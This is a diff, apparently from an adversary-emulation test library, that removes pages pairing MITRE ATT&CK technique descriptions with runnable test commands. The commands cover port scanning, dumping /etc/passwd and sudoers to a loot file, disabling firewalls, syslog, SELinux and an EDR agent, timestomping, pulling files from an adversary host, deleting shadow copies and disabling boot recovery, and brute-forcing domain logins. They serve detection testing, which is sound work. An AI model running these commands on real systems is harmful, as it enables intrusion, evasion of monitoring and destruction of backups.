Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
Normal, benign system and network events from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.
|
||||
|
||||
Platforms: Linux, macOS, Windows
|
||||
|
||||
Data Sources: Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process use of network
|
||||
|
||||
Permissions Required: User, Administrator, SYSTEM</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Scan a bunch of ports to see if they are open](#atomic-test-1---scan-a-bunch-of-ports-to-see-if-they-are-open)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Scan a bunch of ports to see if they are open
|
||||
xxx
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
for port in {1..65535};
|
||||
do
|
||||
echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
|
||||
done
|
||||
```
|
||||
<br/>
|
||||
@@ -1,123 +0,0 @@
|
||||
# T1087 - Account Discovery
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1087)
|
||||
<blockquote>Adversaries may attempt to get a listing of local system or domain accounts.
|
||||
|
||||
===Windows===
|
||||
|
||||
Example commands that can acquire this information are <code>net user</code>, <code>net group <groupname></code>, and <code>net localgroup <groupname></code> using the Net utility or through use of dsquery. If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, System Owner/User Discovery may apply.
|
||||
|
||||
===Mac===
|
||||
|
||||
On Mac, groups can be enumerated through the <code>groups</code> and <code>id</code> commands. In mac specifically, <code>dscl . list /Groups</code> and <code>dscacheutil -q group</code> can also be used to enumerate groups and users.
|
||||
|
||||
===Linux===
|
||||
|
||||
On Linux, local users can be enumerated through the use of the <code>/etc/passwd</code> file which is world readable. In mac, this same file is only used in single-user mode in addition to the <code>/etc/master.passwd</code> file.
|
||||
|
||||
Also, groups can be enumerated through the <code>groups</code> and <code>id</code> commands. In mac specifically, <code>dscl . list /Groups</code> and <code>dscacheutil -q group</code> can also be used to enumerate groups and users.
|
||||
|
||||
Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
|
||||
|
||||
Platforms: Linux, macOS, Windows
|
||||
|
||||
Data Sources: API monitoring, Process command-line parameters, Process monitoring
|
||||
|
||||
Permissions Required: User
|
||||
|
||||
Contributors: Travis Smith, Tripwire</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - List all accounts](#atomic-test-1---list-all-accounts)
|
||||
|
||||
- [Atomic Test #2 - View sudoers access](#atomic-test-2---view-sudoers-access)
|
||||
|
||||
- [Atomic Test #3 - View accounts with UID 0](#atomic-test-3---view-accounts-with-uid-0)
|
||||
|
||||
- [Atomic Test #4 - List opened files by user](#atomic-test-4---list-opened-files-by-user)
|
||||
|
||||
- [Atomic Test #5 - Show if a user account has ever logger in remotely](#atomic-test-5---show-if-a-user-account-has-ever-logger-in-remotely)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - List all accounts
|
||||
xxx
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
cat /etc/passwd > #{output_file}
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - View sudoers access
|
||||
xxx (requires root)
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
cat /etc/sudoers > #{output_file}
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - View accounts with UID 0
|
||||
xxx
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
grep 'x:0:' /etc/passwd > #{output_file}
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #4 - List opened files by user
|
||||
xxx
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #5 - Show if a user account has ever logger in remotely
|
||||
xxx
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
lastlog > #{output_file}
|
||||
```
|
||||
<br/>
|
||||
@@ -1,98 +0,0 @@
|
||||
# T1089 - Disabling Security Tools
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1089)
|
||||
<blockquote>Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.
|
||||
|
||||
Detection: Monitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log or event file reporting may be suspicious.
|
||||
|
||||
Platforms: Linux, macOS, Windows
|
||||
|
||||
Data Sources: API monitoring, Anti-virus, File monitoring, Services, Windows Registry, Process command-line parameters
|
||||
|
||||
Defense Bypassed: Anti-virus, File monitoring, Host intrusion prevention systems, Signature-based detection, Log analysis</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Disable iptables firewall](#atomic-test-1---disable-iptables-firewall)
|
||||
|
||||
- [Atomic Test #2 - Disable syslog](#atomic-test-2---disable-syslog)
|
||||
|
||||
- [Atomic Test #3 - Disable Cb Response](#atomic-test-3---disable-cb-response)
|
||||
|
||||
- [Atomic Test #4 - Disable SELinux](#atomic-test-4---disable-selinux)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Disable iptables firewall
|
||||
Disables the iptables firewall
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
|
||||
then
|
||||
service iptables stop
|
||||
chkconfig off iptables
|
||||
service ip6tables stop
|
||||
chkconfig off ip6tables
|
||||
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
|
||||
systemctl stop firewalld
|
||||
systemctl disable firewalld
|
||||
fi
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Disable syslog
|
||||
Disables syslog collection
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
|
||||
then
|
||||
service rsyslog stop
|
||||
chkconfig off rsyslog
|
||||
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
|
||||
systemctl stop rsyslog
|
||||
systemctl disable rsyslog
|
||||
fi
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Disable Cb Response
|
||||
Disable the Cb Response service
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
|
||||
then
|
||||
service cbdaemon stop
|
||||
chkconfig off cbdaemon
|
||||
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
|
||||
systemctl stop cbdaemon
|
||||
systemctl disable cbdaemon
|
||||
fi
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #4 - Disable SELinux
|
||||
Disables SELinux enforcement
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
setenforce 0
|
||||
```
|
||||
<br/>
|
||||
@@ -1,84 +0,0 @@
|
||||
# T1099 - Timestomp
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1099)
|
||||
<blockquote>Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name Masquerading to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)
|
||||
|
||||
Detection: Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.
|
||||
|
||||
Platforms: Linux, Windows
|
||||
|
||||
Data Sources: File monitoring, Process monitoring, Process command-line parameters
|
||||
|
||||
Defense Bypassed: Host forensic analysis
|
||||
|
||||
Permissions Required: User, Administrator, SYSTEM</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Set a file's access timestamp](#atomic-test-1---set-a-files-access-timestamp)
|
||||
|
||||
- [Atomic Test #2 - Set a file's modification timestamp](#atomic-test-2---set-a-files-modification-timestamp)
|
||||
|
||||
- [Atomic Test #3 - Set a file's creation timestamp](#atomic-test-3---set-a-files-creation-timestamp)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Set a file's access timestamp
|
||||
Stomps on the access timestamp of a file
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| target_filename | Path of file that we are going to stomp on last access time | Path | |
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
touch -a -t 197001010000.00 #{target_filename}
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Set a file's modification timestamp
|
||||
Stomps on the modification timestamp of a file
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| target_filename | Path of file that we are going to stomp on last access time | Path | |
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
touch -m -t 197001010000.00 #{target_filename}
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Set a file's creation timestamp
|
||||
Stomps on the create timestamp of a file
|
||||
|
||||
Setting the creation timestamp requires changing the system clock and reverting.
|
||||
Sudo or root privileges are required to change date. Use with caution.
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| target_filename | Path of file that we are going to stomp on last access time | Path | |
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
NOW=$(date)
|
||||
date -s "1970-01-01 00:00:00"
|
||||
touch #{target_filename}
|
||||
date -s "$NOW"
|
||||
stat #{target_filename}
|
||||
```
|
||||
<br/>
|
||||
@@ -1,68 +0,0 @@
|
||||
# T1105 - Remote File Copy
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1105)
|
||||
<blockquote>Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
|
||||
|
||||
Adversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with Windows Admin Shares or Remote Desktop Protocol.
|
||||
|
||||
Detection: Monitor for file creation and files transferred within a network over SMB. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.
|
||||
|
||||
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
|
||||
|
||||
Platforms: Linux, macOS, Windows
|
||||
|
||||
Data Sources: File monitoring, Packet capture, Process use of network, Netflow/Enclave netflow, Network protocol analysis, Process monitoring
|
||||
|
||||
Permissions Required: User
|
||||
|
||||
Requires Network: Yes</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - xxxx](#atomic-test-1---xxxx)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - xxxx
|
||||
xxxx
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Run it with `bash`!
|
||||
```
|
||||
### TODO: Not sure how to handle commands that need to be run on multiple systems
|
||||
|
||||
# Adversary System Configuration
|
||||
# Ensure SSH access has been configured for an adversary account
|
||||
echo "This file transferred by scp" > /tmp/adversary-scp
|
||||
echo "This file transferred by sftp" > /tmp/adversary-sftp
|
||||
mkdir /tmp/adversary-rsync
|
||||
cd /tmp/adversary-rsync
|
||||
touch a b c d e f g
|
||||
|
||||
# Victim System Configuration
|
||||
# Ensure SSH access has been configured for a victim account
|
||||
# Ensure write access for victim account to this directory
|
||||
mkdir /tmp/victim-files
|
||||
cd /tmp/victim-files
|
||||
|
||||
# Push files to victim using rsync
|
||||
rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/
|
||||
|
||||
# Pull files from adversary using rsync
|
||||
rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/
|
||||
|
||||
# Push files to victim using scp
|
||||
scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/
|
||||
|
||||
# Pull file from adversary using scp
|
||||
scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file
|
||||
|
||||
# Push files to victim using sftp
|
||||
sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'
|
||||
|
||||
# Pull file from adversary using sftp
|
||||
sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
|
||||
```
|
||||
<br/>
|
||||
@@ -1,237 +0,0 @@
|
||||
# T1107 - File Deletion
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1107)
|
||||
<blockquote>Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.
|
||||
|
||||
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native cmd functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)
|
||||
|
||||
Detection: It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.
|
||||
|
||||
Platforms: Linux, Windows, macOS
|
||||
|
||||
Data Sources: Binary file metadata, File monitoring, Process command-line parameters
|
||||
|
||||
Defense Bypassed: Host forensic analysis
|
||||
|
||||
Permissions Required: User
|
||||
|
||||
Contributors: Walker Johnson</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Victim configuration](#atomic-test-1---victim-configuration)
|
||||
|
||||
- [Atomic Test #2 - Delete a single file](#atomic-test-2---delete-a-single-file)
|
||||
|
||||
- [Atomic Test #3 - Delete an entire folder](#atomic-test-3---delete-an-entire-folder)
|
||||
|
||||
- [Atomic Test #4 - Overwrite and delete a file with shred](#atomic-test-4---overwrite-and-delete-a-file-with-shred)
|
||||
|
||||
- [Atomic Test #5 - Victim configuration](#atomic-test-5---victim-configuration)
|
||||
|
||||
- [Atomic Test #6 - Delete a single file - cmd](#atomic-test-6---delete-a-single-file---cmd)
|
||||
|
||||
- [Atomic Test #7 - Delete an entire folder - cmd](#atomic-test-7---delete-an-entire-folder---cmd)
|
||||
|
||||
- [Atomic Test #8 - Delete a single file - ps](#atomic-test-8---delete-a-single-file---ps)
|
||||
|
||||
- [Atomic Test #9 - Delete an entire folder - ps](#atomic-test-9---delete-an-entire-folder---ps)
|
||||
|
||||
- [Atomic Test #10 - Delete VSS - vssadmin](#atomic-test-10---delete-vss---vssadmin)
|
||||
|
||||
- [Atomic Test #11 - Delete VSS - wmic](#atomic-test-11---delete-vss---wmic)
|
||||
|
||||
- [Atomic Test #12 - bcdedit](#atomic-test-12---bcdedit)
|
||||
|
||||
- [Atomic Test #13 - wbadmin](#atomic-test-13---wbadmin)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Victim configuration
|
||||
Create a temporary directory and several files on the victim system for later deletion
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
mkdir /tmp/victim-files
|
||||
cd /tmp/victim-files
|
||||
touch a b c d e f g
|
||||
echo "This file will be shredded" > /tmp/victim-shred.txt
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Delete a single file
|
||||
Delete a single file from the temporary directory
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
rm -f /tmp/victim-files/a
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Delete an entire folder
|
||||
Recursively delete the temporary directory and all files contained within it
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
rm -rf /tmp/victim-files
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #4 - Overwrite and delete a file with shred
|
||||
Use the `shred` command to overwrite the temporary file and then delete it
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
shred -u /tmp/victim-shred.txt
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #5 - Victim configuration
|
||||
Create a temporary directory and several files on the victim system for later deletion
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
mkdir %TEMP%\victim-files-cmd
|
||||
cd %TEMP%\victim-files-cmd
|
||||
type nul > a
|
||||
type nul > b
|
||||
type nul > c
|
||||
type nul > d
|
||||
type nul > e
|
||||
type nul > f
|
||||
type nul > g
|
||||
mkdir %TEMP%\victim-files-ps
|
||||
cd %TEMP%\victim-files-ps
|
||||
type nul > a
|
||||
type nul > b
|
||||
type nul > c
|
||||
type nul > d
|
||||
type nul > e
|
||||
type nul > f
|
||||
type nul > g
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #6 - Delete a single file - cmd
|
||||
Delete a single file from the temporary directory using cmd.exe
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
del /f %TEMP%\victim-files-cmd\a
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #7 - Delete an entire folder - cmd
|
||||
Recursively delete the temporary directory and all files contained within it using cmd.exe
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
del /f /S %TEMP%\victim-files-cmd
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #8 - Delete a single file - ps
|
||||
Delete a single file from the temporary directory using Powershell
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `powershell`!
|
||||
```
|
||||
Remove-Item -path %TEMP%\victim-files-ps\a
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #9 - Delete an entire folder - ps
|
||||
Recursively delete the temporary directory and all files contained within it using Powershell
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `powershell`!
|
||||
```
|
||||
Remove-Item -path %TEMP%\victim-files-ps -recurse
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #10 - Delete VSS - vssadmin
|
||||
Delete all volume shadow copies with vssadmin.exe
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
vssadmin.exe Delete Shadows /All /Quiet
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #11 - Delete VSS - wmic
|
||||
Delete all volume shadow copies with wmic
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
wmic shadowcopy delete
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #12 - bcdedit
|
||||
xxx
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
bcdedit /set {default} bootstatuspolicy ignoreallfailures
|
||||
bcdedit /set {default} recoveryenabled no
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #13 - wbadmin
|
||||
xxx
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
wbdadmin delete catalog -quiet
|
||||
```
|
||||
<br/>
|
||||
@@ -1,54 +0,0 @@
|
||||
# T1110 - Brute Force
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1110)
|
||||
<blockquote>Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.
|
||||
|
||||
Credential Dumping to obtain password hashes may only get an adversary so far when Pass the Hash is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: Wikipedia Password cracking)
|
||||
|
||||
Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)
|
||||
|
||||
A related technique called password spraying uses one password, or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
|
||||
|
||||
Detection: It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network.
|
||||
|
||||
Monitor authentication logs for system and application login failures of Valid Accounts. If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.
|
||||
|
||||
Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.
|
||||
|
||||
Platforms: Linux, macOS, Windows
|
||||
|
||||
Data Sources: Authentication logs
|
||||
|
||||
Permissions Required: User
|
||||
|
||||
Contributors: John Strand</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Brute Force Credentials](#atomic-test-1---brute-force-credentials)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Brute Force Credentials
|
||||
Creates username and password files then attempts to brute force on remote host
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| input_file_users | Path to a file containing a list of users that we will attempt to brute force | Path | DomainUsers.txt|
|
||||
| input_file_passwords | Path to a file containing a list of passwords we will attempt to brute force with | Path | passwords.txt|
|
||||
| remote_host | Hostname of the target system we will brute force upon | String | \\COMPANYDC1\IPC$|
|
||||
| domain | Domain name of the target system we will brute force upon | String | YOUR_COMPANY|
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
net user /domain > #{input_file_users}
|
||||
echo "Password1" >> #{input_file_passwords}
|
||||
echo "1q2w3e4r" >> #{input_file_passwords}
|
||||
echo "Password!" >> #{input_file_passwords}
|
||||
@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
|
||||
```
|
||||
<br/>
|
||||
@@ -1,106 +0,0 @@
|
||||
# T1113 - Screen Capture
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1113)
|
||||
<blockquote>Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.
|
||||
|
||||
===Mac===
|
||||
|
||||
On OSX, the native command <code>screencapture</code> is used to capture screenshots.
|
||||
|
||||
===Linux===
|
||||
|
||||
On Linux, there is the native command <code>xwd</code>. (Citation: Antiquated Mac Malware)
|
||||
|
||||
Detection: Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.
|
||||
|
||||
Platforms: Linux, macOS, Windows
|
||||
|
||||
Data Sources: API monitoring, Process monitoring, File monitoring</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Screencapture](#atomic-test-1---screencapture)
|
||||
|
||||
- [Atomic Test #2 - Screencapture (silent)](#atomic-test-2---screencapture-silent)
|
||||
|
||||
- [Atomic Test #3 - X Windows Capture](#atomic-test-3---x-windows-capture)
|
||||
|
||||
- [Atomic Test #4 - Import](#atomic-test-4---import)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Screencapture
|
||||
Use screencapture command to collect a full desktop screenshot
|
||||
|
||||
**Supported Platforms:** macOS
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| output_file | xxx
|
||||
| Path | desktop.png|
|
||||
|
||||
#### Run it with `bash`!
|
||||
```
|
||||
screencapture
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Screencapture (silent)
|
||||
Use screencapture command to collect a full desktop screenshot
|
||||
|
||||
**Supported Platforms:** macOS
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| output_file | xxx
|
||||
| Path | desktop.png|
|
||||
|
||||
#### Run it with `bash`!
|
||||
```
|
||||
screencapture -x
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - X Windows Capture
|
||||
Use xwd command to collect a full desktop screenshot and review file with xwud
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| output_file | xxx
|
||||
| Path | desktop.xwd|
|
||||
|
||||
#### Run it with `bash`!
|
||||
```
|
||||
xwd -root -out #{output_file}
|
||||
xwud -in #{output_file}
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #4 - Import
|
||||
Use import command to collect a full desktop screenshot
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| output_file | xxx
|
||||
| Path | desktop.png|
|
||||
|
||||
#### Run it with `bash`!
|
||||
```
|
||||
import -window root
|
||||
```
|
||||
<br/>
|
||||
@@ -1,53 +0,0 @@
|
||||
# T1115 - Clipboard Data
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1115)
|
||||
<blockquote>Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications.
|
||||
|
||||
===Windows===
|
||||
|
||||
Applications can access clipboard data by using the Windows API. (Citation: MSDN Clipboard)
|
||||
|
||||
===Mac===
|
||||
|
||||
OSX provides a native command, <code>pbpaste</code>, to grab clipboard contents (Citation: Operating with EmPyre).
|
||||
|
||||
